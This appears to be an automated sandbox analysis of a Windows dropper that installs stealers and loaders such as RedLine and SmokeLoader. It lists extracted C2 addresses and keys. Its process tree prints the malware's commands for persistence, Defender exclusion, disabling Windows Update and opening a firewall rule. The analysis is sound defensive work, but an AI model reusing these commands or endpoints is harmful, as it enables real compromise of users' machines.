Analysis
-
max time kernel
14s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
08-07-2023 09:08
Static task
static1
Behavioral task
behavioral1
Sample
5247f286b68bc92d3035e205c.exe
Resource
win7-20230703-en
General
-
Target
5247f286b68bc92d3035e205c.exe
-
Size
5.3MB
-
MD5
5247f286b68bc92d3035e205c669ba43
-
SHA1
a2300146f6545e570f5e0b290c59a60aed8d00b7
-
SHA256
0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620
-
SHA512
bf312c2603ca5445ccfc1820920101a92b92e109f65a2e87623feb567e805674ca632c0464870efab4974bc0464e8a0cc41e24acab6f555310cb282d2feba2a3
-
SSDEEP
98304:5RQP+mv3dnIJUp+EQkeScktlsJMDIpnFSFJeQ6J95tCn7fv:Hevt+5EZikLs6IBFK6J95o7fv
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
redline
070723_rc_11
amrc.tuktuk.ug:11290
-
auth_value
5c003bb2a44f6538df34879227a9ad34
Extracted
laplas
http://lpls.tuktuk.ug
-
api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde
Signatures
-
Detect Fabookie payload 3 IoCs
resource yara_rule behavioral2/memory/3340-161-0x00007FF7D50D0000-0x00007FF7D522F000-memory.dmp family_fabookie behavioral2/memory/3340-162-0x0000000001EA0000-0x0000000001FD1000-memory.dmp family_fabookie behavioral2/memory/3340-298-0x0000000001EA0000-0x0000000001FD1000-memory.dmp family_fabookie -
Glupteba payload 1 IoCs
resource yara_rule behavioral2/memory/1196-374-0x0000000002E00000-0x00000000036EB000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Conhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updChrome.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2112 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updChrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updChrome.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation 5247f286b68bc92d3035e205c.exe Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation oldplayer.exe Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation oneetx.exe -
Executes dropped EXE 12 IoCs
pid Process 3340 aafg31.exe 3620 oldplayer.exe 3660 XandETC.exe 4584 oneetx.exe 1500 setup.exe 3300 updEdge.exe 5100 Conhost.exe 1192 updChrome.exe 4464 powershell.exe 3092 toolspub2.exe 3048 updEdge.exe 2384 Conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0006000000023221-238.dat themida behavioral2/files/0x0006000000023221-258.dat themida behavioral2/memory/1192-269-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-278-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-279-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-282-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-288-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-293-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/files/0x0006000000023221-295.dat themida behavioral2/memory/5068-296-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-300-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-326-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-329-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-333-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-337-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-335-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-363-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/files/0x0006000000023221-376.dat themida behavioral2/memory/556-401-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/1192-473-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/5068-532-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/memory/556-575-0x00007FF6F5EA0000-0x00007FF6F6C76000-memory.dmp themida behavioral2/files/0x0018000000023233-674.dat themida behavioral2/files/0x0006000000023221-703.dat themida behavioral2/files/0x000c00000002323d-706.dat themida behavioral2/files/0x000c00000002323d-735.dat themida behavioral2/files/0x0018000000023233-857.dat themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updChrome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5100 Conhost.exe 1192 updChrome.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4464 set thread context of 3092 4464 powershell.exe 106 -
Launches sc.exe 35 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3628 sc.exe 2516 sc.exe 2244 sc.exe 2976 sc.exe 4324 sc.exe 3376 sc.exe 440 sc.exe 1348 sc.exe 3176 sc.exe 4608 sc.exe 2496 sc.exe 3676 sc.exe 1112 sc.exe 2412 sc.exe 1376 sc.exe 2216 sc.exe 3640 sc.exe 4384 sc.exe 1260 sc.exe 4956 sc.exe 3116 sc.exe 4588 sc.exe 4140 sc.exe 528 sc.exe 1172 sc.exe 2508 sc.exe 4472 sc.exe 2664 sc.exe 3376 sc.exe 1984 sc.exe 1732 sc.exe 4620 sc.exe 1744 sc.exe 3856 sc.exe 1556 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 5084 1500 WerFault.exe 98 384 1500 WerFault.exe 98 4588 1500 WerFault.exe 98 4308 1500 WerFault.exe 98 2904 1500 WerFault.exe 98 4904 1500 WerFault.exe 98 4824 1500 WerFault.exe 98 5064 1500 WerFault.exe 98 732 1500 WerFault.exe 98 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5056 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 46 Go-http-client/1.1 -
Kills process with taskkill 1 IoCs
pid Process 336 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3092 toolspub2.exe 3092 toolspub2.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3620 oldplayer.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 3960 wrote to memory of 3340 3960 5247f286b68bc92d3035e205c.exe 84 PID 3960 wrote to memory of 3340 3960 5247f286b68bc92d3035e205c.exe 84 PID 3960 wrote to memory of 3620 3960 5247f286b68bc92d3035e205c.exe 85 PID 3960 wrote to memory of 3620 3960 5247f286b68bc92d3035e205c.exe 85 PID 3960 wrote to memory of 3620 3960 5247f286b68bc92d3035e205c.exe 85 PID 3960 wrote to memory of 3660 3960 5247f286b68bc92d3035e205c.exe 86 PID 3960 wrote to memory of 3660 3960 5247f286b68bc92d3035e205c.exe 86 PID 3620 wrote to memory of 4584 3620 oldplayer.exe 87 PID 3620 wrote to memory of 4584 3620 oldplayer.exe 87 PID 3620 wrote to memory of 4584 3620 oldplayer.exe 87 PID 4584 wrote to memory of 5056 4584 oneetx.exe 88 PID 4584 wrote to memory of 5056 4584 oneetx.exe 88 PID 4584 wrote to memory of 5056 4584 oneetx.exe 88 PID 4584 wrote to memory of 1984 4584 oneetx.exe 90 PID 4584 wrote to memory of 1984 4584 oneetx.exe 90 PID 4584 wrote to memory of 1984 4584 oneetx.exe 90 PID 1984 wrote to memory of 1052 1984 cmd.exe 92 PID 1984 wrote to memory of 1052 1984 cmd.exe 92 PID 1984 wrote to memory of 1052 1984 cmd.exe 92 PID 1984 wrote to memory of 1900 1984 cmd.exe 93 PID 1984 wrote to memory of 1900 1984 cmd.exe 93 PID 1984 wrote to memory of 1900 1984 cmd.exe 93 PID 1984 wrote to memory of 1296 1984 cmd.exe 94 PID 1984 wrote to memory of 1296 1984 cmd.exe 94 PID 1984 wrote to memory of 1296 1984 cmd.exe 94 PID 1984 wrote to memory of 264 1984 cmd.exe 95 PID 1984 wrote to memory of 264 1984 cmd.exe 95 PID 1984 wrote to memory of 264 1984 cmd.exe 95 PID 1984 wrote to memory of 1108 1984 cmd.exe 96 PID 1984 wrote to memory of 1108 1984 cmd.exe 96 PID 1984 wrote to memory of 1108 1984 cmd.exe 96 PID 1984 wrote to memory of 3216 1984 cmd.exe 97 PID 1984 wrote to memory of 3216 1984 cmd.exe 97 PID 1984 wrote to memory of 3216 1984 cmd.exe 97 PID 4584 wrote to memory of 1500 4584 oneetx.exe 98 PID 4584 wrote to memory of 1500 4584 oneetx.exe 98 PID 4584 wrote to memory of 1500 4584 oneetx.exe 98 PID 4584 wrote to memory of 3300 4584 oneetx.exe 101 PID 4584 wrote to memory of 3300 4584 oneetx.exe 101 PID 4584 wrote to memory of 3300 4584 oneetx.exe 101 PID 4584 wrote to memory of 5100 4584 oneetx.exe 192 PID 4584 wrote to memory of 5100 4584 oneetx.exe 192 PID 4584 wrote to memory of 1192 4584 oneetx.exe 104 PID 4584 wrote to memory of 1192 4584 oneetx.exe 104 PID 4584 wrote to memory of 4464 4584 oneetx.exe 131 PID 4584 wrote to memory of 4464 4584 oneetx.exe 131 PID 4584 wrote to memory of 4464 4584 oneetx.exe 131 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4464 wrote to memory of 3092 4464 powershell.exe 106 PID 4584 wrote to memory of 3048 4584 oneetx.exe 108 PID 4584 wrote to memory of 3048 4584 oneetx.exe 108 PID 4584 wrote to memory of 3048 4584 oneetx.exe 108 PID 4584 wrote to memory of 2384 4584 oneetx.exe 265 PID 4584 wrote to memory of 2384 4584 oneetx.exe 265
Processes
-
C:\Users\Admin\AppData\Local\Temp\5247f286b68bc92d3035e205c.exe"C:\Users\Admin\AppData\Local\Temp\5247f286b68bc92d3035e205c.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"2⤵
- Executes dropped EXE
PID:3340
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:5056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1052
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:1900
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:1296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:264
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"5⤵PID:1108
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E5⤵PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\setup.exe"4⤵
- Executes dropped EXE
PID:1500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6205⤵
- Program crash
PID:5084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 8805⤵
- Program crash
PID:384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 8885⤵
- Program crash
PID:4588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 9325⤵
- Program crash
PID:4308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 9405⤵
- Program crash
PID:2904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 11045⤵
- Program crash
PID:4904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 11605⤵
- Program crash
PID:4824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 14605⤵
- Program crash
PID:5064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000240001\setup.exe" & exit5⤵PID:3764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f6⤵
- Kills process with taskkill
PID:336
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6565⤵
- Program crash
PID:732
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
PID:3300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"4⤵PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1192
-
-
C:\Users\Admin\AppData\Local\Temp\1000241001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000241001\toolspub2.exe"4⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\1000241001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000241001\toolspub2.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
PID:3048 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"6⤵PID:3272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"4⤵PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\1000242001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000242001\3eef203fb515bda85f514e168abb5973.exe"4⤵PID:1196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1292
-
-
C:\Users\Admin\AppData\Local\Temp\1000242001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000242001\3eef203fb515bda85f514e168abb5973.exe"5⤵PID:880
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4856
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3748
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:2112
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2040
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
PID:2384
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵PID:3888
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"6⤵PID:2152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"4⤵PID:3780
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵PID:4492
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵PID:556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"2⤵
- Executes dropped EXE
PID:3660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1500 -ip 15001⤵PID:2660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1500 -ip 15001⤵PID:5016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1500 -ip 15001⤵PID:4580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1500 -ip 15001⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵PID:1052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1500 -ip 15001⤵PID:1732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:1256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1500 -ip 15001⤵PID:3740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:4692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1500 -ip 15001⤵PID:4688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1500 -ip 15001⤵PID:4524
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4812
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3376
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:2516
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:4140
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4784
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4588
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:1376
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:2244
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:1260
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:1384
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:3628
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2412
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:1744
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:3176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1500 -ip 15001⤵PID:2768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }1⤵PID:4032
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:4216
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:2392
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:2444
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:4380
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:1748
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:1556
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:4620
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:2216
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f2⤵PID:4892
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f2⤵PID:4820
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f2⤵PID:3620
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f2⤵PID:3888
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4992
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:4520
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:2204
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:4564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:2280
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:2760
-
-
